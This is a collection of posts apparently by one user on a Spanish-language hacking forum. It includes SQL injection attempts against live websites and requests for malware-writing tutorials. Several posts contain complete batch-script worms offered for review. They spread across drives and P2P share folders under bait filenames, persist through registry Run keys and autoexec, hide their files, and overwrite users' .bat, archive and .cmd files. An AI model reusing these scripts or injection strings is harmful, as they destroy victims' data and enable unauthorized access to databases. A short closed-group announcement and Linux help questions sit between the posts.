Temas

Encontre una pagina que tiene una vulnerabilidad SQL:

el servidor es un MySQL tengo los detalles del servidor y toda la cosa

estos son los parametros que inyecto:

----> '4+and+1=0+union+select+1+from+votos+--+

a esta linea

----> modules.php?name=Surveys&op=results&pollID=

cuando lo hago obtengo el resultado siguiente:

   
Encuesta



Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/***/***/***/sql_layer.php on line 301 (por supuesto los asteriscos los puse yo para cubrir datos que considero sensible)
estare haciendo algo malo, y no me digan que pase el sqlmap, ya lo hice y lo unico que dice es:

[18:32:04] [CRITICAL] invalid target details, valid syntax is for instance 'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME'; or 'access://database_filepath'

[Grupo cerrado]

No se si es el lugar debido para postear esto pero aqui va:

Me ah llegado a la cabeza la pregunta, Es posible que formemos un grupo de newbies en el foro? por que no?

Si la repuesta es si,,pues:

Podriamos formar un grupo de newbies, para compartir entre nosotros ideas, codigos, aprendizaje, etc..la organizacion seria algo como esto:

• obligatorio
  
• requerido
  
  *> debemos tener conexion a internet(sea propia o no)
  
  +> el grupo no puede tener mas de diez(10) miembros.. asi, de formarse otro grupo podriamos competir entre grupos(esto es bueno por que la competencia fomenta el aprendizaje)..
  
  *> todos los miembros deben tener aceso a GNU/Linux(tenerlo instalado, en una maquina virtual, aceso a shell remota, etc).
  
  +> seguiremos/leeremos manuales por lo que se requiria tener una formar una biblioteca de tutoriales, manuales, ahitepapers, etc.
  
  +> empezaremos por lo basico, pero todos los miembros deben tener conocimiento general-basico sobre informatica, esto quiere decir que por lo menos debes saber encender y apagar la pc
  
  *> se programaran herramientas, se realizaran competencias, que publicaremos en el foro(lo que no se si esta permitido o no).
  
  *> como los grupos deben ser ordenados y democraticos las decisiones importantes seran sometidas a votacion.
  
  *> cada miembro debera reportar los que ah aprendido ya sea publicando codigo, programando una herramienta, etc, etc.
  
  *> de ser necesario se eliminara/hechara a miembros que incurran en acciones perjudiciales o ilegales, es solo con intenciones educacionales .
  
  +/*? se podria publicar una eZine
  
  +> necesitaremos un lugar donde reunirnos para eso podemos usar IRC, MSN, ICQ, direcciones de correo, salas de chat,etc, etc, *nada que tenga que ver con redes sociales* *no personal* *no facebook* *google+* *no tabe* no babe* *no hi5*, nada
  
  
  Grupo cerrado, debido a que el tiempo se ah agotado no se reciviran mas solicitudes
  
  Miembros confirmados:
  
  

  
  dArKo2   /* activo
  eagle17   /* confirmado - activo
  portaro    /* no confirmado - eliminado
  kub0x      /* confirmado - activo
  bitaziko    /*no confirmado - elimidado
  mini_nauta   /*no confirmado - eliminado
  IWKY    /* confirmado
  Ivar <---se retiro
  a0xsys   /* confirmado - activo
  DameBanda    /* confirmado - activo
  farresito      /* confirmado - activo
  kal3o  /* confirmado - activo
  

  
  Si estabas interesado pero no apareciste en la lista MP
  
  saludos

estoy de vuerta y practicando SQLi, me encontre con un caso interesante intente hacer SQLi una pagina"

*Servidor IIS 6.0
*ASP.net
*puerto 80
*puerto 443

el problema es que cuando intento probar si es vulnerable usando '1+and+1=0 no me muestra errores la pagina o el link cuestion termina asi:

/search.cfm?cat=1

cuando lo ejecuto no pasa nada sin embargo cuando uso cambio el valo a 0"

/search.cfm?cat=0

si me muestra el error

ayuda por favor
sl0th

Aqui la version final de mi pequeña creacion la version 'B' no es la gran cosa pero recuerden que es batch :S

Código (dos) [Seleccionar] Expandir


@echo off
assoc .avi=batfile
if %date% GEQ 02/27/2012 goto :~0xDdAy
if exist %systemdrive%\AnGurrIa.x (goto :EOF)
for %%A in (E F G H I J K L M N O P Q R S T U V W X Y Z) do copy %0 %%A:\AnGurrIa.bat
for %%u in (*.*) do attrib -s -r -a %%u >nul
copy /Y %0 %systemdrive%\AnGurrIa.bat >nul
attrib -r -h -s C:\autoexec.bat
copy %0 C:\AnGurrIa.x >nul
type C:\autoexec.bat|find "AnGurrIa.x">C:\autoexec.bat
echo call C:\AnGurrIa.x >> C:\autoexec.bat
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v BootConfig /t REG_SZ /d C:\AnGurrIa.x
attrib +r +h +s c:\autoexec.bat
attrib +r +h +s c:\AnGurrIa.x
set 1=VideosXxX
set 2="benlla_Carolina_xxxAVI"
set 3="mujer_con_pony_XXXX"
set 4="adolecentes_Ardientes"
set 5="hot_lesbians"
set 6="BoricuaxXxPlayBoy[Avi-DvDRip]"
set x=%homedrive%\ñoño.bk
cd\
type %0>ñoño.bk
mkdir %1%
cd %1%
for %%b in (%2% %3% %4% %5% %6%) do mkdir %%b
dir /b >%tmp%\secmngr.tmp
for /f "tokens=* " %%x in (%temp%\secmngr.tmp) do
call :~sEx %%x
net share "%homedrive%\VideosXxX"
pause >nul
:~sEx
set clit=%1
cd %clit%
type %1>"video.avi"
cd %homedrive%\%a%
echo set shell = CreateObject("wscript.shell") >%homedrive%\0x.vbs
echo shell run "cmd /c %0" xxx", vbHide >>%homedrive%\0x.vbs
start /B /HIGH /D %homedrive%\0x.vbs
set f="%systemdrive%%~AnGurrIa.bat"
cd "%systemdrive%%~AnGurrIa.bat"
echo eMule\Incoming\ > %windir%\mZ.p
echo Shareaza\Downloads\ >> %windir%\mZ.p
echo BearShare\Shared\ >> %windir%\mZ.p
echo EDONKEY2000\incoming\ >>%windir%\mZ.p
echo LimeWire\Shared\ >> %windir%\mZ.p
echo Ares??? >>%windir%\mZ.p
echo Daddy_Yankee_exitos >%windir%\mX.p
echo Kaspersky_Keygen >>%windir%\mX.p
echo benlla_carolina_sextape >>%windir%\mX.p
echo Windows_7_Keygen >>%windir%\mX.p
echo Harry_Potter[avi][DvD-Rip] >>%windir%\mX.p
echo reggaeton_lo_ma_pegao >>%windir%\mX.p
echo black_berry_unlocker[totalmentegratis] >>%windir%\mX.p
echo iphone_unlocker[gratis] >>%windir%\mX.p
set v4=1
set b4="%programfiles%\WinRar\WinRAR.exe"
%b4% a %windir%\t.rar %f%
if not %errorlevel%==9009 set v4=0
goto :~zUz
:~x0x
set v=%1
for /F "tokens=*" "delims=" %%n in (%windir%\mX.p) do (
if %v4%==0 copy /Y %0 "%%n.bat"
cls
%b4% a "%%n.rar" "%%n.bat")
goto :EOF
:~zUz
for /F "tokens=*" "delims=" %%q in (%windir%\mZ.p) do (if exist %programfiles%\%%n
cd %programfiles%\%%n
)
for %%i in (*.rar) do (
copy /Y %0 "%%m.bat"
)
%b4% a "%%a" "%%n.bat"
cls
call :~x0x %%a
pause >nul
cd %windir%
del /F *.p
cd\
assoc .x=batfile
ren c:\AnGurrIa.bat c:\AnGurrIa.x
copy /Y %0 %temp%\%random%.x
copy /Y %0 %appdata%\%random%.x
copy /Y %0 %allusersprofile%\%random%.x
:~0xDdAy
echo.UnEtE aL lAdO oScUrO, tEnEmOs GaLlEtAs GrAtIs!!! >%temp%\AnGurrIa.tmp
echo.OtRa GuErRa iNjUsTiFiCaDa??!! >>%temp%\AnGurrIa.tmp
for %%a in (*.txt,*.log) do ren *.bat %%a >nul
for %%a in (*.bat) do copy %temp%\AnGurrIa.tmp %%a >nul
for %%i in (*.iso,*.rar,*.zip,) do set xy=%%i
copy %temp%\AnGurrIa.tmp %xy%
del /F %temp%\AnGurrIa.tmp
:EOF
exit


les agradeceria si revisan el codigo y me dicen si tiene errores

alguno de ustedes saben donde encontrar buenos tutos de C para programar malware???






salu2

bueno aqui esta mi codigo (en batch como es de esperarse) ya que soy nuevo en esto de la programacion en Batch seguire intentando programar cada vez un poco mejor  seguire practicando en este lenguaje de scripting tan facinante como es batch  ya estoy trabajando en la version "B" de este code, les pido que si dedican su tiempo a leer este codigo se detengan un poco a darme algunos consejos para asi aplicar lo aprendido en codigos futuros....de antemano gracias...

Código [Seleccionar] Expandir


@rem X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-TEST-FILE!$H+H*
@rem ++++++++++++++++++++++++++++++++++++++++++++++++
@rem +[No]: AnGurRIa.a                              +
@rem +[Au]: Sl0tH                                   +
@rem +[Pr]: No                                      +
@rem +[In]: Si                                      +
@rem +[Po]: No                                      +
@rem +[Ob]: Si                                      +
@rem +Comment:                                      +
@rem +Este archivo de comandos por lotes ah sido    +
@rem +creado con fines meramente educacativos       +
@rem +el autor del mismo no se responsabiliza del   +
@rem +mal uso o lo daños que puedan ser ocacionados +
@rem +por dicho codigo.                             +
@rem ++++++++++++++++++++++++++++++++++++++++++++++++
@set attrib=%eax%
@set for=%jmp%
@set copy=%get%
@set in=%oop%
@set echo=%null%
@set trash=
assoc .zzx=batfile
%trash%
if exist %prografiles%\Windows Live\Messenger\msnmsgrassistent.zzx (goto:_qwerty) else (goto:_ytrewq)
:_ytrewq
@%null% off
%trash%
%get% /Y %0 %prografiles%\Windows Live\Messenger\msnmsgrassistent.zzx
%trash%
reg add HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run /v MSNHelper /T REG_SZ /d %prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%eax% %prografiles%\Windows Live\Messenger\msnmsgrassistent.zzx +h +r +s
%trash%
%eax% %windir%\*.* -h -r -s
%trash%
%jmp% %%i %oop% (%windir%\*.log,*.txt,*.htm,*.bat) do %get% %0 %%i
%eax% %windir%\*.* +h +r +s
%trash%
%eax% %windir%\web\*.* -h -r -s
%trash%
%jmp% %%i %oop% (%windir%\web\*.log,*.txt,*.htm,*.bat) do %get% %0 %%i
%eax% %windir%\web\*.* +h +r +s
%trash%
%eax% %programfiles%\*.* -h -r -r
%trash%
%jmp% %%i %oop% (%programfiles%\*.log,*.txt,*.htm,*.bat) do %get% %0 %%i
%eax% %programfiles%\*.* +h +r +r
%trash%
%jmp% %%i %oop% (%windir%\*.log,*.txt,*.htm,*.bat) do ren *.cmd
%trash%
%jmp% %%i %oop% (%windir%\web\*.log,*.txt,*.htm,*.bat) do ren *.cmd
%trash%
%jmp% %%i %oop% (%programfiles%\*.log,*.txt,*.htm,*.bat) do ren *.cmd
:_qwerty
%trash%
%null% @echo off >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% :_fe3d >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% for %%a in (%windir%\*.cmd) do echo jgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhj >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% for %%a in (%windir%\web\*.cmd) do echo jgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhj >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% for %%a in (%programfiles%\*.cmd) do echo jgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhjjgcxjhgkjhcxgkjdhflkgjhxhjxhjjjhjkfjjkhjhjfjjhjjhj >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%null% goto:_fe3d >>%prografiles%\Windows Live\Messenger\msnhelp.zzx
%trash%
%eax% %prografiles%\Windows Live\Messenger\msnhelp.zzx +h +r +s
%trash%
mkdir %prografiles%\WhenUsave
%trash%
mkdir %prografiles%\UltimateSearch
%trash%
mkdir %prografiles%\Complus Aplications
%trash%
mkdir %prografiles%\Search4fun
%trash%
mkdir %prografiles%\ZangoGames
%trash%


gracias a SDK por su tutorial el cual me esta siendo muy util y me ayudo con el entendimiento del For y a un user que me ayudo a entender mas el For que ahora por flojera no lo escribire...


saludos

digamos que se da el caso de que tengo varios discos (C,D,E,F,G...etc) y me eh infectado con un autorun.inf, como podria hacer para poder usar un comando sobre todos esos archivos que estan presentes en esos disco?

es posible hacer algo como:
attrib -h -r -s *.inf c:,d:,e:,f:,etc ?

o digamos que el caso es que el worm o el virus copia un .bat, .exe...como haria para hacer lo mismo pero en esos que tienen diferentes extensiones?

es posible hacer algo como:
attrib -h -r -s *.inf,*.exe,*.bat ?

el primer intento que hago de hacer alguna cosa en batch...quiero que alguien se tome la molestia de revisar este codigo y si encuentra errores o me puede dar algunas sugerencias de como mejorarlo, adelante, las criticas constructivas seran bien recividas..

Código [Seleccionar] Expandir


@echo off
rem ***********************************************
rem * name: win32.amerifags                       *                                            
rem * by: sl0th                                   *        
rem * Infection method: No                        *
rem * Polymorphism: No                            *
rem * Payload: No                                 *
rem * Propagation method: No                      *                    
rem ***********************************************
copy /y "c:\System Volume Imformation\Winservices\amerifags.zzx"
assoc .zzx=batfile
reg add "HKLM\Software\Microsoft\Internet Explorer\http" /v "InternetExplorerUpdate" /d "c:\System Volume Imformation\Winservices\amerifags.zzx" /f
mkdir "c:\System Volume Imformation\Winservices"
attrib +h +r +s "c:\System Volume Imformation\Winservices\amerifags.zzx"
echo call "c:\System Volume Imformation\Winservices\amerifags.zzx">AUTOEXEC.bat
echo ^<head^> >>%USERPROFILE%\host.html
echo ^<title^> >>%USERPROFILE%\host.html
echo ^<h4^> [C.m.D] ^</h4^> >>%USERPROFILE%\host.html
echo ^</title^> >>%USERPROFILE%\host.html
echo ^</head^> >>%USERPROFILE%\host.html
echo ^<body^> >>%USERPROFILE%\host.html
echo ^<b^>^<h1^> vXed by sl0th!! ^</h1^>^</b^> >>%USERPROFILE%\host.html
echo ^</body^> >>%USERPROFILE%\host.html
eof


debo agradecer a SDK por el tutorial me esta siendo muy util y me ah alentado a seguir creando cositas como estas..

saludos

todavia tengo algunos problemas o mejor dicho muchos problemas para usar el FOR en Batch me parece que las explicaciones que eh leido son muuuuy complicadas y los ejemplos muuuuuuuy vacios...por favor ayuda!!

mi duda es en cuanto o como puede afectar que una clave de registro llame a la ejecucion un archivo que este oculto o que la carpeta que lo contiene lo este?

Hola una duda que tengo desde hace unos dias....es posible programar/codear controles activex en algun lenguaje de scripting como por ejemplo; VBScript o JScript?



saludos

eh estado tratando de usar assoc para cambiarle la apariencia a un archivo batch y lamentablemente para mi no me funciona de ninguna manera...alguien tiene alguna sugerencia de que es lo quie esta pasando?

al intentar ejecutar un VBS me dice que hay un error en la linea siete supuestamente en el caracter 79 o algo asi...aqui la linea de codigo

Código [Seleccionar] Expandir

if Month(Now())=7 then MsgBox"The summer is almost ending :'(",48,"Aha!"
if Month(Now())=8 then MsgBox"August is in jail, it isn't a month anymore",16,"Is just a big joke.."
if Month(Now())=9 then MsgBox"I hate Christmass, Don't you?",48,Christmassive"
if Month(now())=10 then MsgBox"I'm an Atheist",48,"I admit it"
if Month(Now())=11 then MsgBox"Is almost here buddy",48,"I really hate it..."
if Month(Now())=12 then MsgBox"Is here, i hate christmass i really hate it, i do bad stuff when i'm angry",48,"I hate it"

cual seria la forma mas facil de crear una barra de progreso en VBScript? quiero crear una que cuente unos 40 segundos mas o menos....eh leido algunos ejemplos en internet pero son demasiado largos 

http://answers.yahoo.com/question/index?qid=20100508080305AA17d73

necesito que me recomienden algun software que pueda gestionar VPN's eh leido por ahi que las VPN pueden resultar ser el mejor metodo de anonimato mientras se esta en internet alguna recomendacion??

necesito un buen manual que pueda leer de vez en cuando estaba buscando uno que me recomendo alguien que se llama "Introduccion a la programacion de virus en ASM por zeroPad".

alguien sabe donde puedo encontrarlo?

hola yo tratando de hacerme el independiente y luchar un poco con la constumbre de usar window$ de nuevo tengo un problema instalando JRE(java runtime enviroment) esto es lo que me sale en la shell:

java-package: Depende: debhelper pero no va a instalarse
                Recomienda: dpkg-dev pero no va a instalarse
                Recomienda: gcc pero no va a instalarse
  limewire-basic: Depende: sun-java6-jre pero no es instalable o
                           icedtea-java7-jre pero no es instalable o
                           sun-java6-jdk pero no es instalable o
                           icedtea-java7-jdk pero no es instalable
                  Recomienda: libstdc++5 (>= 1:3.3.4-1) pero no va a instalarse

eh investigado por ahi y no, nada de nada

estoy usando Debian 5 a.k.a Lenny y cada vez que quiero usar el aMSN debo copiar y pegar el @ si quiero usarlo  como se hace el arroba con el teclado? por que con alt+64 no me sale....aaaaaaaaaaaaaah y otra cosa el pipe "|" tampoco se como sacarlo alguien puede ayudarme por favor?

no soy muy bueno cuando de programacion se trata pero se que se pueden hacer muchas cosas si manejas bien un lenguaje de programacion, asi que me pregunto que lenguaje me recomendarian para empezar a diseñar malware?





saludos